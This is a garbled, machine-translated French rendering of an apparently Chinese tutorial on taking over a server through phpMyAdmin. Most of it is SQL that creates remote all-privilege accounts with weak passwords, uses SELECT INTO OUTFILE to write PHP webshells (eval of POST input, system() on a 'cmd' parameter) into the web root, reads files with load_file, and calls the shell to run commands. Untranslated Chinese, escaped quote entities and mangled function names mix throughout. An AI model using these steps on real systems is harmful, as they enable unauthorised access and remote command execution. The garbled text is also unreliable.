Résumé PHPmyadmin prend le shell

Ce qui suit est résumé par la colonne tutoriel phpmyadmin phpmyadminObtenez le shell, j'espère qu'il sera utile à vos amis. dans le besoin !

PHPmyadmin prend le résumé du shell

PHPmyadmin change le mot de passe utilisateur

Cliquez directement sur localhost ou 1270.0.1 ci-dessus, la colonne utilisateur apparaîtra, cliquez pour modifier

Ajouter le mot de passe du super utilisateur deviner ooxx et autoriser les connexions externes

GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WITH GRANT OPTION;

Nous pouvons créer un compte root et définir un mot de passe

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;

De cette façon, nous créons un compte de lien externe root avec un mot de passe de 123456. Utilisez 123456 pour les liens externes

Quatre façons classiques de utiliser Shell :

Première méthode :

CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
INSERT INTO `mysql`.`study` (`7on` )VALUES (&#39;<?php @eval_r($_POST[7on])?>&#39;);
SELECT 7onFROM study INTO OUTFILE &#39;E:/wamp/www/7.php&#39;;
----以上同时执行，在数据库: mysql 下创建一个表名为：study，字段为7on，导出到E:/wamp/www/7.php
    一句话连接密码：7on

Méthode deux :

读取文件内容：    select load_file('E:/xamp/www/s.php');
写一句话：    select &#39;<?php @eval_r($_POST[cmd])?>&#39;INTO OUTFILE &#39;E:/xamp/www/study.php&#39;
cmd执行权限：    select &#39;<?php echo \&#39;<pre class="brush:php;toolbar:false">\&#39;;system($_GET[\&#39;cmd\&#39;]); echo \&#39;

\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'

Troisième méthode :

La version JhackJ de PHPmyadmin prend le shell

Create TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES(&#39;<?php eval_r($_POST[cmd])?>&#39;);
select cmd from study into outfile &#39;E:/wamp/www/7.php&#39;;
   
Drop TABLE IF EXISTS study;
   
<?php eval_r($_POST[cmd])?>
--------------------------------------------------------------------------------
<?php @eval_r($_POST[cmd])?>
   
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
INSERT INTO study( cmd ) VALUES (&#39;<?php eval_r($_POST[cmd])?>&#39;);# 影响列数： 1
SELECT cmdFROM study INTO OUTFILE &#39;E:/wamp/www/7.php&#39;;# 影响列数： 1
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。

Méthode 4 :

select load_file('E:/xamp/www/study.php');
select &#39;<?php echo \&#39;<pre class="brush:php;toolbar:false">\&#39;;system($_GET[\&#39;cmd\&#39;]); echo \&#39;

\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'

Visitez ensuite l'annuaire du site Web : http://www.2cto.com/ study.php?cmd=dir

Lorsque Phpmyadmin exporte une phrase (Errcode : 13 - Autorisation refusée)

n'a pas l'autorisation pour ce répertoire. Vous pouvez essayer le. répertoire de niveau supérieur ou répertoire de niveau inférieur

Si cela ne fonctionne pas, essayez NTS pour le trafic

Faites également attention au répertoire

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!